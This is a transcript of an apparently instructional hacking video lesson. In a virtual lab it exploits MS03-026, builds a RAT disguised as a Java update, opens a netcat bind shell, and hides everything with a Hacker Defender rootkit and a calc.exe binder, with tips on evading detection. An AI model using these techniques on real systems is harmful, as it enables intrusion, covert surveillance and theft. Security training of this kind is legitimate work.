All right, folks, let's get started hacking and have some fun. What we have here is, I don't even have any whiteboards to introduce this particular nugget, because really it's just kind of a Hack O Rama. In fact, I'll just call it that. Hack O Rama. Okay, there's your whiteboard, only it's blue in this case. So that's what we're going to be doing. We're just going to be taking advantage of a lot of the things we talked about in the last nugget. Taking a look at some more Metasploit items that we can use. Looking at Trojans, looking at rootkits, things like this. So let's go ahead and get started and have some fun. Now, when we get started here as well, I want to point out that I'm using a new installation of Linux. This one's Backtrack, and this particular version is version 5. This is actually still Ubuntu. It's an older version of Ubuntu than the one I've been using, but it's still good. And the advantage of using Backtrack is it's kind of a custom packaged installation of Linux that you can get from backtrack-linux.org. And it's got a lot of the hackers tools already installed. Take a look at this, Backtrack, and then you can get all kinds of things. Network analysis, there's all kinds of tools there that you can do network analysis on. Let's see, let's go take a look at some of these others. Exploitation tools, such as, Metasploit's on here. If we go to network exploitation tools, there's Metasploit framework. There's also some Cisco stuff if you're interested in doing that sort of thing. All kinds of really cool stuff is involved in this. Now the Metasploit's on the start menu, but I'm going to go ahead and just do an MFS console here. Okay. Oops, I guess I typed that in wrong, didn't I? Maybe I should have used the one on the menu. So it's MSF, isn't it? MSF console. There we go. I knew that didn't look right when I typed it in. Okay, so what we're going to do is we're going to start off by using the Metasploit framework to hack into the system using an exploit that we've used in the past, which is a very common exploit and very easy to use, so we'll just stick with that one. And then we're going to take a look at a different payload and see how this works out. So here you can see what I've done is I've run this common MS03026 DCOM item that we've had in the past. I'm running the remote host of 10.10.10.90, which is my server, Windows Server 2003. This is my local backtrack system at .45. And this time I'm using a different payload. I'm using a VNC inject. This will give me a desktop that I can use to control this remote system. So I'm going to go ahead and now exploit this, and we're going to see a little bit of a difference in how things are going to look here. So once this comes up, we're going to see we have a session created in the background, and we'll just give it a couple of moments to percolate. It's actually not done, even though it's returned me to this prompt here. So let's give it a moment. There it goes. And now take a look at that. Wow. Whew. This is actually giving me the desktop over on my Windows Server 2003 machine. Now, in reality, for most servers, there's usually not a person who's interactively logged on. So in this case, there was a user account logged on, and when they do that, they'll have a Metasploit courtesy shell. That's a little bit of a dead giveaway. You don't want that to pop up while someone's actually looking at the screen, so you might want to make sure that there's nobody actually over there if you can help it. But otherwise, that's what we've got here. And then if they didn't log on, then if you press the F8 key, then you get this. Okay, so if this would be the case if we were at a logon screen and we needed to log on using some credentials that maybe we stole earlier, some passwords that we cracked or something like that, and then we would just go down here to send Control-Alt-Delete, for example. Okay, so that's kind of how that looks. Now, from this point, as you can imagine, we can pretty much do whatever we want to do. We can use trivial file transfer protocol and a number of different things like this. We can scroll down here and take a look at the start menu and look at some of the programs they've got installed. We can stop services. You name it. We can just do really whatever we want to at this point. Alright, for our next attack here, it's going to be pretty much the same thing we've done in the past. We're just going to load a shell, which gives us a command prompt. Did I do that wrong? Yes, I did that right. Okay, so then I'm going to go ahead and exploit. And I'm not explaining all of this again because we've seen this a couple of times by now. We're just going to go ahead and exploit. Now you can see here again, I'm at a Windows command prompt. So the next thing I want to do is to start the telnet service over there. So I'm just going to, since I'm at a Windows command prompt here on that server, I'll do a net start telnet. And now we got this telnet service starting, and we're good to go. Now, this is just really kind of a matter of preference as a hacker. Maybe you're more familiar with telnet and you'd prefer to use it. Just another way of being able to do things like work with the administrative options that are within Windows. And most administrative functions that you would want to perform, you could do from telnet here. So I'm just going to go ahead and exit this now, but I'm just showing here that we could go ahead and run that if we wanted to. Okay. Actually, I'll Control-C to get out of that and get out of that session. Next, I want to go ahead and run something called the remote access tool, and this is going to allow me to have full administrative control over a destination machine as well. Now, this is a very cool tool because it gives you a full UI to do a lot of cool things. What you do is you just download this. You can Google for it, and there's several different ones out there. And this particular one's called Nuclear Winter Rat. And the first thing you'll do is just go to the client here. Okay. Also, if you're running this from an actual production Windows machine, I don't know if I recommend doing any of this from a production machine. I'm doing this from a Windows virtual machine. But you would also want to probably disable your software, like your antivirus software and stuff, because it will pick up on all of this as a virus, and it will prevent you from running it, even though you're trying to hack somebody else. You're not the one being hacked. And you can see here little red X's and things, all that down there. You can tell that I've disabled some of that on my own computer here. So anyway, I'm going to go ahead and run this client piece. And this is what we use to actually build a tool and a platform from which we can perform our hack. Now, the trick to this whole thing is you really have to go with this create server item. What we're trying to do is to create an executable that we can run on the destination machine, and then we'll be able to use this as a rootkit. So I'm going to create server. We start off by going to the reverse connection tab, and we enter in the IP address here. Now, the common thinking here is we'll enter in the IP address of the machine we're trying to attack. That's not what you do here. This is the reverse connection, so this is the IP address of the host that we are attacking from. In other words, I'm currently working on a Windows Vista computer, and my local IP address is 10.10.10.21. I am the attacker. You do not enter in the target's IP address. You enter in your IP address here. All right? And then what we'll want to do next is specify a port, and you can change this. And in actual hacking, it's probably a good practice to change this to something else, because this is a well-known port for Nuclear Rat. And you can again see the title up there. If you want to search for this, you can look for it, Nuclear Rat, and there's the hacker that created this. And then we'll go to the direct connection. Now, sometimes the reverse connection might not work, for a number of different networking issues or something like that. You can also do a direct connection over here, and if you do that, you'll have to enter in a server password that will allow you to make a direct connection. This also is the default password that's used, but you might want to change this to something else, because otherwise, if you are able to compromise this destination machine, and there are other hackers out there who are kind of trolling around for exploited machines, they'll just try the default password and they'll be able to get in, and then you'll have to share your hacking with that person. So you don't want to do that. And then on the installation tab here, you'll just give it an install file name. Install.exe is fine. A DLL name. This is where we were talking about earlier, I think in our last nugget, that one of the signs of having been rooted or having a rootkit on a machine is that there might be driver files that end in .sys that are actually malicious DLLs. Okay, so this actually can operate as a DLL and assist the hacker in exploiting your system. And then in this case, it's going into the Windows directory and then some other things here. But one of the things I find very interesting is on the Options tab. Here's my assigned target name. I just called it that. Look at this Melt Server. What does that do? After it installs itself on the destination machine, it will destroy itself so that there's no trace that the installation files were there. And then this Create Hybrid Server, that allows us to both work as in both a direct and a reverse connection. All right, and then the message box is what's going to be kind of the part where you fool the person. Here, I've just called it Java. That's interesting. I mean, people always say, hey, I guess I need a Java update. Or they see updates for Java all the time. So hopefully they'll see a message here telling them that something about Java, that this version of Java is incompatible. What's it say? I don't remember what I put on the end. Incompatible with this browser. And it could be a warning. You can also make it an error message, an information, a question, whatever. And then you can also show the test message so you can see what this will look like on the client side of things. So if someone happens to be sitting there, they'll just see this and then they'll just click OK, and that'll pretty much be it. Okay. Really, that's kind of a visual cue that the server, and when I say server here, I mean the Trojan server, has been installed on that destination computer, and that computer is compromised from that point forward. Also, if you want to do some logging, you can go to the IP logger. What I've done is over on my Linux box, I've started the Apache web server, and this is the IP address of that Linux box. You don't have to do this, but it might be kind of interesting to find it. And then what I can do here next is just click on Build, and then it's going to ask me for the name of this executable. And I'll just call this, how about Java .exe, okay? .exe, okay? So go ahead and create this, and we'll see that it's going to go ahead and put it in this location. There it is. Now, be very careful of this if you do this, all right? Do not double-click on this, because then you will potentially compromise your own machine. Okay, we're the attackers here. We don't want to get compromised. So this is what's going to be the payload, or the bad piece, the malware, so to speak, that we're going to deliberately install on somebody else's computer. You don't want to install that on your own. And if you do double-click on it, by the way, there's no way to get it off your machine. Okay, so this will permanently compromise your computer. Here I've just copied it over in the background to my Linux box, because this is where my TFTP files are. I'm going to be using this later on to transfer the file and some others to my Windows Server 2003 machine. And then in the background I just went ahead and typed all of this in for my Metasploit, and I'm going to exploit. Again, this is stuff we've seen before, so I'm not going to elaborate on it too much. But now I'm ready to use TFTP. This is going to be transferring files from my Linux backtrack machine over to my Windows Server 2003 box. So I'm just going to go TFTP, FTP, and then to this IP address, 10.10.10.45, which is my TFTP server. I'm going to get my file, which is java.exe. All right, we got that just fine. The next thing I'll do is TFTP -I for the IP address of, again, 10.10.10.45. This time I want to get another process. This is psexec.exe. This is something that was developed by Mark Rusinovich, who's now a fellow at Microsoft. And this is a guy who I think I mentioned before has all kinds of very cool tools out there and everything. But the way this works is I would not be able to run java.exe without psexec.exe. So thank you very much, Mark Rusinovich and Microsoft, for allowing us to do this. Anyway, now that I've got that going, all I have to do is type in psexec and then and then java.exe. Okay, so I'm just going to run. psexec is telling Java to go ahead and run. We'll go ahead and run this, as you can see here, and cross our fingers. Sometimes hacks actually blow up on you, so hopefully this isn't one of them. But what we will want to see happen here is that over on our other machine, where is it? This one over here on this machine, we should see a connection come up. And again, this doesn't always work, but we'll see what happens. And I got a new server connection. Okay, so that's pretty cool. And then I'm just going to go ahead and double-click on this, and that actually gives us a direct connection to it. All right, so now what can we do with this? Oh, I almost forgot to show you first here. This is all going on a virtual machine. Let me drag this virtual machine over. This is the Windows Server 2003 box that is compromised. And look, there's the message that they got. Okay. This Java is incompatible with this browser. Whatever. And then they click OK. That's just what users do. If you give them an OK button, they will click it. Thank you very much. And then let's go ahead and take a look at the kinds of things we can do over here. Now that we have control of this thing, let's go to Spy and Screen. Wonder what that would give us. If we click on Take, oh, look at that. This person's not doing productive work. They're shopping for digital cameras on the internet. This is a Nikon D3S digital camera. It's only about $5,200. And I put that up there just kind of as a hint, really, because, you know, if you're trying to think of something to get me for Christmas, might as well start saving now. That's what I would like to have. Anyway, you can't get them anyway because the tsunami in Japan kind of killed the production of these things, and they're almost impossible to get right now. Anyway, what other things could you do? Well, you can click on Spy. Webcam. If they have a webcam, you can actually turn on the webcam and see that person. Oh my goodness, people, be careful. You may see something that you don't want to see. You may see something you can never unsee. You may want to gouge out your own eyes after you've done this. Don't ask me how I know about that. Okay. There's also this keylogger. I can click on. You can also capture clicks so you can know when they're using their mouse. And then I'm just going to go over here on the other machine here. Actually, sorry, clicking on too many things at once. I'm going to go back over to my machine that we've compromised here, and I'm just going to start typing in something here in Notepad. And we can see everything that they're typing in. Anytime that they backspace, that's the BS means backspace, people, not what you think it means. Okay, and and then you can say, am going to quit. I'm typing all this on the server, and yet it's all showing up here in our keylogger. Okay, so we can do that sort of thing. I'm going to go ahead and stop that now. You get the idea. All right, what else have we got? could go over here to spy and information. And then you just get, and you can get a lot of good information about what kind of machine there is, how much memory it's got. You get the idea there. All kinds of things that are going on there. By the way, the install path that we saw there is install.exe. The DLL path, install.sys. This is stuff that we put there. This is part of the Trojan, which is our rootkit. What else we got? The server DLL is injected into Internet Explorer. As a result of that, when you do something like look at Task Manager, actually it's on the wrong computer there, but if you looked at something like Task Manager, you wouldn't see anything suspicious because Internet Explorer is running. That seems fine. It's part of Windows, right? No problem there. So anyway, quite a lot of stuff we can get just on the surface of this, and it's very easy to use. Alright, I had to pause recording for a minute because I lost the connection. I don't know if it was a network interruption or whatever, but that's part of hacking. Just sometimes this stuff bombs out on you. You gotta start over again. Okay, so what else can you do? Well, you can work with the mouse. You could just place it in a certain location. I don't really use this much because you can get its current location, and then you can set it in a given location, but it's kind of cumbersome. It's really much better to use VNC or something like that if you can exploit that. You can make it a SOC server and a web server, meaning that you can direct web traffic through it, and then I could open up a web browser and actually use something like browse the file resources through a web browser. That's kind of cool. Here's this remote shell. Let's go ahead and start that. That's nothing that we haven't seen before. Pretty much gives us the command prompt, and you can, just do a dir if you want to or whatever, and it'll show you whatever you want it to do. Okay, just the same kind of stuff you could always do from a command prompt. Some of the things you can do here, and we won't exhaust all of these, but you can look at the processes that are running on the machine. You could do this and refresh it, and then it will show you all the processes that are currently going on over there. For example, let's see. Maybe they're on to me. Maybe they're doing something where they're, running Wireshark, trying to see what I'm doing. And if I drag the virtual machine over here, we can see that indeed they're running Wireshark over there. Maybe they're on to us. Well, that's no good. I think what we'll have to do is to just kill that process. And sure enough, killed it. All right, so you can just kill stuff that you want to kill. You can also inject processes into something else if you want. And maybe every time the DNS server starts up, you can inject the server into this process. The server is the hack that we created earlier that we downloaded to this machine. Well, now every time DNS starts up, it relaunches this Trojan. And I've never really tried it with DNS, but it could be anything. It could be Notepad, could be Internet Explorer like it already is, anything you want it to. And that's one reason why these rootkits are so difficult to get rid of, because you don't know what people have planted them into, what process they're hooked into on your computer, and it's just a needle in a haystack. You might as well just format C:, really, if you ever suspect that you've gotten infected with one of these kits. What else could we do? Here, let's go to Manager, and how about this one? Registry Manager. You always have to hit refresh when you open these. I don't know why, but Registry Manager, I could go into HKey Local Machine, and then I could go into Software and Microsoft, Windows, Current Version, and Run, and I could plant some other malware in the Run key, or again, run this particular rootkit every time the computer starts up. So you can imagine the kind of things you can do there. Very, very potentially destructive things you can work with. Can fiddle around with their plugins. Anyway, you get the idea. Hey, on extras, there's another one that's kind of fun. Here, let's just do this message box. How about this? Internet security. Your computer has been scanned. No viruses. We'll give them this informational message, and this is what it'll look like on their computer. And I'm going to go ahead and send it over to them, and you can see that over on this Windows Server 2003 machine, they've received this message. Ooh, that's so good. I feel so much better that I know my machine has not been compromised now that I've received that message. Okay, so those are kind of fun things to goof around with as well. Alright, here I've gone back over to my backtrack machine, and you can see I've just run, again, the common exploit that we've run many times. This time I've gone ahead and downloaded a different file. This is netcat, or nc.exe. This is actually a very good tool for practical purposes. You can kind of use it as a substitute for Telnet, for example, and many other things for making remote connections. But as far as hackers are concerned, you could kind of turn it into a Trojan here as well. So, for example, if I wanted to make it a Trojan within cmd.exe, I could do something like this. Now that I've copied it down here, I could do nc. I guess I better type in here, nc, and then -l, and then P, which is going to just identify the port that I want to use. Let's just give it a port, 666. That's the Doom port, but it's not being used right now, so I should be able to use it. And then -E, and then cmd.exe. Now, what is this doing? Well, the L forces it to stay in listening mode when the client connects. And that's going to happen if we want to be able to always backdoor into this machine. The P is simply the port, and you can see I put the port number in there. And then the E will bind to the CMD. Okay, so I'll press enter here, and now you can see that we're in listening mode right now. Okay, now what I'm going to do is from my, and this is all taking place over on the Windows Server 2003 box, but over here on my backtrack machine, I'm going to open up another command prompt here. I'm just going to run netcat to 10.10.10.90, and then what port did I give it? I think it's 666. And now you can see I'm directly connected over there. Now, what's the difference between this and what I was working with earlier, where I already had a command prompt here? Why would I just do this to create another command prompt? Well, part of the reason is because this will perform faster. It's just a cleaner way of going. It runs in its own processes, and it's not part of an exploited service the way that the other one is. Plus, I can always reconnect to this at any time I want. Okay, as long as, let me go back over here, as long as this is just left open, I can go about my business. I can go to lunch, go to Taco Bell, get a delicious steak chalupa supreme. Boy, I'm sure hungry. And then come back, and then later on, if I want to, I can just remake this connection again. Okay, so let's say I even close this. All right, so I'm closing that terminal. Then I come back, hours later, I can do the exact same thing over again without having to rerun Metasploit or something like this. Okay, and there we are. So a pretty cool way of working there using netcat. And of course, it's not the end-all for everything, but now that I have the command prompt, just like I did with other hacks, I can copy any files over there I want to, I can rootkit it, I can do all the other stuff as a launching pad from. Alright, so you can see that a lot of the hackers' tools are pretty dangerous if you're on the receiving end of those. I mean, you do not want to get hacked. You don't want to have a rootkit on your system. You don't want to have some kind of Trojan on your system that can take full administrative control. Some of those things are still visible, though. Let me see if I can find an example. Well, let's just go back to our original machine here. I just switched over here to the Windows Server 2003 box. Now look what happens here if I go to Task Manager. Remember earlier we were running netcat over here? Well, guess what? There's a big red flag right there if I have any security knowledge and I'm an administrator looking at the processes running on this computer. So this is a real problem for me. There are also probably going to be some kind of antivirus or anti-spyware product that may also flag this as a problem and kill it. So what I want to do is to kind of conceal that, really, so that it can't be seen. And one of the ways that we can do that is to use something called Hacker Defender. Now, despite the way the name sounds, this does not mean that it protects the public from hackers. It means that it protects hackers from the public. It's defending the hackers, is what this does. And the way it does it is it'll run this executable on the victim's machine, and then after that runs, anything that is in this INI file will be true. Now, the contents of the INI file I'll show you here shortly, but this is how it's going to hide things like files, registry keys, processes, things of this nature. So I'm going to go ahead and crack this open, and let me change the font a little bit here so we can see things a little bit more clearly. Make it size 16 maybe, and you can see that it kind of looks like a bunch of gobbledygook. Oh, wow, that's just hard to read, and it's not really very easy to work with, and especially if you don't speak Czech. This makes it even harder down here at the bottom. This is all comment section. You don't have to worry about that part. There is an English section down at the bottom that gives you further instructions, though, that you might want to peruse when you get the second. But again, you can check out hxdef100.ini. This is the file that provides instructions to Hacker Defender. The strange characters that we see here, like these greater than symbols, the backslash, the forward slash, quotations, things like that. I think there's also like question marks or something in here. No, just those items. Well, those will all help to obscure Hacker Defender from things like your antivirus products. You see, I can remove all of these strange symbols, and if I did, it would just say hidden table, and then it would just say hxdef without the quotation marks. But the reason why those are in there are to kind of add salt, so to speak, to make it more difficult for antivirus and anti-spyware products to be able to remove this kind of thing. It's really just an obstruction. And you can see here what it does is we want to hide rcmd, for example. That would be, if I rename my command prompt to rcmd instead of cmd, then it would hide that so that nobody can see it. I will also be able to hide anything that starts with hdef, and then there's an asterisk there for it, so that anything that starts with hdef. And the reason why we want to do that is because Hacker Defender tools and files start with hdef. This will prevent anybody that's on the computer that's the victim computer from being able to see Hacker Defender running. So those are some of the things that we see going on there. And this just identifies, the name of the service would be Hacker Defender. Here's the registry keys that it hides. Okay, so any keys that are Hacker Defender 100, and you can see several others here. Hidden registry values, you can also add those in. I didn't put any in here, but you can also add the specific values themselves that you want to obscure. Here we have, as part of Hacker Defender, I'm going to force it to start up Netcat. So Netcat's going to go ahead and start up, and it's going to be hooked up to cmd.exe on port 5678. There's also a couple of ports that we're going to hide. You see, I want to open up the inbound port 5678 and the outbound port 5678. However, if you do a netstat, you would be able to see those ports open. Well, by using Hacker Defender here, it will conceal them from all those types of tools so that it won't even know, the operating system won't even know that it's got those ports even open, even though it does. And then you can have some general settings here, like a password if you want to assign one. This is the default password of hxdef rules. And there's several other things here as well, such as, here's what I wanted to show you. Remember I was saying earlier again that your sys files can kind of fake their way as driver files when they're actually malicious files? Well, there you go. That's the Hacker Defender file right there. So I'm going to make this available for you on nuggetlab.com along with the study guide so that you don't have to retype all this from scratch. You can just use everything I've done here. It was really hard to type this out. It about made me cross-eyed having to do all of this. It's like one of those things my mother told me would make me go blind. Well, this is one of them, apparently. Anyway, so I'm going to have this available for you, and you don't have to retype it. Now, I've taken the Hacker Defender files and the INI file that we just looked at, and I've copied them over here to my Windows Server 2003 server. Now, of course, there's a number of different ways we could have done that through Netcat or TFTP, or a lot of different methods we could have chosen that I've shown you in the past. Here, I just kind of made it quick and dirty and just copied them over here. Again, here's the INI file, okay, that we already looked at, and then what we're going to see happen here is if the INI file is working properly, and if I've done everything right, then when I double-click on this exe here, in a few moments, these files will start to disappear. Anything that starts with hxdef, and there it goes. Okay, they just disappeared because Hacker Defender is hiding anything that would reveal that it's actually installed on this computer. And this is where it's very handy so that you can conceal other rootkits. There might be multiple rootkits installed on this computer, multiple Trojans. We can hide all of them using Hacker Defender as a cover. Alright, now here I've gone to my Windows Server 2003 machine, only because, number one, I have Hacker Defender over here also. I've got all the files, same files we've been looking at before. But I've also got another tool over here called Senna 1exe Maker, and you can see it right here. And this is actually kind of a hard tool to find right now. I have kind of searched all over for this particular version of it. I don't think it's being developed anymore, but it actually still works. And it's very easy to use. You simply click on Add File, and what you'll do with this is you'll specify a file that you want the user to double-click on, or that you want them to run. So to be simple, I'm just going to use calculator, calc.exe, and I'll just browse for that real quick in the Windows System 32 directory. And then we're looking for calc.exe. Okay? So what we do with this is I want that to open normal. You can see there's other options here. And I want it to copy to the root of the drive. That's just how this seems to work best if we do it that way. And then the other thing we'll do is we're going to add another file in here. And of course, that's going to be our Trojan. Of course, there's nothing threatening about calculator. We can run that all day and it won't hurt anything. Unless I'm trying to balance my checkbook. It doesn't handle negative integers very well, so it doesn't work that well for that. But anyway, we have this other here, hxdef 100, and all these other hxdef items. Now, obviously, Hacker Defender is not running right now because I can see all the hxd files. Remember, the INI file specifies to hide those particular items. So what I would want to do now is I would want to lump these two together. So I'd kind of inject hxdef into calc.exe. So I'm going to now look for that file, and I'll go to my hacks and hacker defender and hxdef100.exe. This one I'll just leave the way it is, but what we want to do is to pack the files, and then we will save everything, and I'll just save this on the desktop just to make it simple, but you'll put this wherever you want it to go, of course. And I'll just call this, well, calc, because I want to fool people into thinking that this is the calculator, right? So, now watch what happens here. This is now a packaged Trojan, and this can be used to launch Hacker Defender, and it would then hide other Trojans that are installed on the systems, or hide rootkits that are installed on this system. So when I double-click on this, oh, I get calculator, that's fine, you know, we can calculate a bunch of stuff, all seems to work just fine, and we can even close that. However, oh, look what happened there. Now all my Hacker Defender files disappeared, and that we could set up the INI file so that also any other hackers files that I had installed on this user's system would also be obscured from view and potentially even out of sight of any virus scanners that they might have. So that's it for this particular nugget. In the last nugget, we looked at the meanings of Trojans and how they work, and the meanings of rootkits and how they work, and viruses and things of this nature. And then this nugget, we took a look at how to actually make them work and actually exploit a system. So it's kind of a lot of fun. Well, I hope this has been informative for you, and I'd like to thank you for viewing.